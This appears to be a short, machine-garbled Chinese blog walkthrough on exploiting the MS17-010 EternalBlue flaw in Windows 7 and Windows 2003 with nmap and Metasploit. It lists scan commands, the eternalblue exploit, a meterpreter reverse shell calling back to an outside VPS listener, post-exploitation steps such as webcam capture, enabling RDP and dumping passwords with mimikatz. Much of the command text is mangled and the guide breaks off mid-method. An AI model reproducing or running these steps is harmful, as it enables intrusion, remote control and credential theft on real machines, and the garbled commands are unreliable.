win7ms17010補丁,cve20190708漏洞複現
0x01常規打法掃描是否存在ms17-010漏洞:
nmap-n-p445---- script smb- vuln-ms17-010192.168.1.0/24---open MSF的常規漏洞利用:
msfuseexploit/windows/SMB/ms17 _ 010 _ eternalbluemsfsetrhost 192.168.1.112反擊: MSFsetpayloadwindows/x64/me teter reverse _ tcpmsfsetlhost 192.168.1.118前鋒: msfsetpayloadwindows/x64/meter preter/bind _ TCP的一般功能:
打開桌麵捕獲meterpreter screenshot視頻meterpreter webcam_scream遠程桌麵meterpreterrunpost/windows/manage/enable_rdp目標密碼解密第一步:加載mimikatzmeterpreterloadmimikatz第二步:使用wdigest命令獲取密碼的meter preter wigest0x000
1 .環境
vps 140.x.x.x
目標192.168.3.123
本地kali 192.168.3.62
2.vps打開監聽。
use exploit/multi/handlersetpayloadwindows/x64/meter preter/reverse _ tcpsetlhost0.0.0.0set lport 443 exploit-j
3 .在3.kali下發起攻擊。
use exploit/windows/SMB/ms17 _ 010 _ eternalbluesetrhost 192.168.3.123 setpayloadwindows/x64 /元數據/reverer
從run到下圖的接口Ctrl C
4.vps收到了元數據。 (不穩定的話就多次打) )。
0x03目標為Win2003時,穩定點擊sdbks (指令執行)
ms F5 use auxiliary/admin/SMB/ms17 _ 010 _ command ms F5 setcommandwhoamimsf5setrhostsx.x.x.x
方法2 (返回元數據) )
留言0